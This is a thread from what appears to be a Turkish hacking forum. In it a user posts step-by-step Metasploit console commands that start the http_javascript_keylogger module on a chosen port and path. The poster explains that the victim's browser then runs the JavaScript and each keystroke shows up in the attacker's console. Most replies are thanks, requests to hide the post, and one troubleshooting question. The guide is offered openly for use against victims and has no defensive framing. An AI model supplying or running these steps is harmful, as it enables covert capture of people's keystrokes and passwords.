Hustrox
Bronz Üye
- İlgi Alanlarınız
- Teknolojik Olan Herşey.
- Erkek
Hacktivizm içerisinde gerçekleştirmeyi düşündüğünüz tüm ticaretlerde, dikkat ve önlem sahibi olun.
Forum içerisinde yaşadığınız tüm sorunlar için sohbet alanını ya da sayfanın altında belirtilen Telegram kanalımızı kullanın.
Türkçemizi her bakımdan doğru kullanın ve forum kurallarına uygun paylaşımlar yapmaya özen gösterin.
Çalsalar bile soru sorunca böm böm bakacaktılar bilgilendirme için teşşekürler.Eline Sağlık knk da konulara hide koysan daha iyi olur sanki çalmasınlar ne olur ne olmaz
Rica Ederim knkÇalsalar bile soru sorunca böm böm bakacaktılar bilgilendirme için teşşekürler.
Hide at dostum, eline sağlık tekrardan.Metasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
NOT: Linux İşletim Sistemleri İçin Geçerlidir
1) Metasploit konsolunu açın ve "use auxiliary/server/capture/http_javascript_keylogger" komutunu girin. Bu, javascript keylogger modülünü kullanmanızı sağlar.
2) "set SRVPORT" komutunu kullanarak istediğiniz port numarasını belirleyin. Örneğin, "set SRVPORT 8080" Port Açacağız
3) "set URIPATH" komutunu kullanarak istediğiniz URI yolunu belirleyin. Örneğin, "set URIPATH /keylogger"
4) "run" komutunu kullanarak keylogger modülünü çalıştırın.
5) vicitm tarafında keylogger javascript kodu çalıştırılır ve her tuşa basıldığında o tuşun karakteri, Metasploit konsolunda görüntülenir.
Tarafımca Yazılmıştır.
Hide Atamaıyorum Düzenleme Süresi Geçmiş.Hide at dostum, eline sağlık tekrardan.
bakalımMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
*** Hidden text: cannot be quoted. ***
Ellerinize sağlıkMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
eyvallahMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
eline sağlıkMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
exploiti sen mi yazdın yoksa hazır olandan mıMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
EywMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
peki linke girince 404 veriyo ama apache kuruluMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
bklmMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
bana yanlış bilgi vermişler sağolmetasploit exploit aracı metasploit yazıyor
EywMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
eywMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;
Adam yaMetasploit kullanarak keylogger oluşturmak için aşağıdaki adımları izleyin;